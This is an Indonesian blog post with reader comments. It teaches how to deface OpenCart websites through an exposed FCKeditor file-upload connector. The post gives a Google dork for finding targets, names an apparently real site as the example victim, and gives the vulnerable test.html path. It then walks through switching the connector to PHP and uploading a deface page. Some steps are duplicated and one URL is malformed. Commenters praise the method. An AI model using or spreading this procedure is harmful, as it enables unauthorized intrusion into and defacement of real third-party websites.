Ok sekarang langsung saja kita praktekan cara Deface Remote File Upload Opencart
1. Tentunya kita memerlukan Dork untuk mencari targetnya di Google
Dork : Powered By OpenCart site:com
2. Sudah dapet targetnya ?
Contoh : http://www.homemadestuff.co.uk
3. Setelah itu kita membutuhkan POC
POC : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
4. Kita Inject Exploitnya dengan POC diatas, sehingga jadinya seperti ini :
http://http://www.homemadestuff.co.uk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
5. Maka akan muncul sebuah tampilan
Contoh : http://imageshack.us/f/215/61228773.png/
http://http://www.homemadestuff.co.uk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
5. Maka akan muncul sebuah tampilan
Contoh : http://imageshack.us/f/215/61228773.png/
6. Ganti connectornya menjadi dari ASP menjadi PHP
7. Upload File Tampilan Deface kita (*.html atau *.htm)
8. Jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
Contoh : http://imageshack.us/f/841/76539701.png/
9. Untuk melihat apakan berhasil di upload atau tidak kita ke "Get Folders and Files"
dan lihat hasilnya.
10. Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
Hasil : http://www.homemadestuff.co.uk/rifqi.html
9. Untuk melihat apakan berhasil di upload atau tidak kita ke "Get Folders and Files"
dan lihat hasilnya.
10. Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
Hasil : http://www.homemadestuff.co.uk/rifqi.html
3 comments
Nice
Wahhh Ajibb banget nie Caranya ...
Boleh di coba nie sobb
Sekalian folow nie #49
Di tunggu nie folow baliknya
makasi
Ok udah saya FollBack #166
EmoticonEmoticon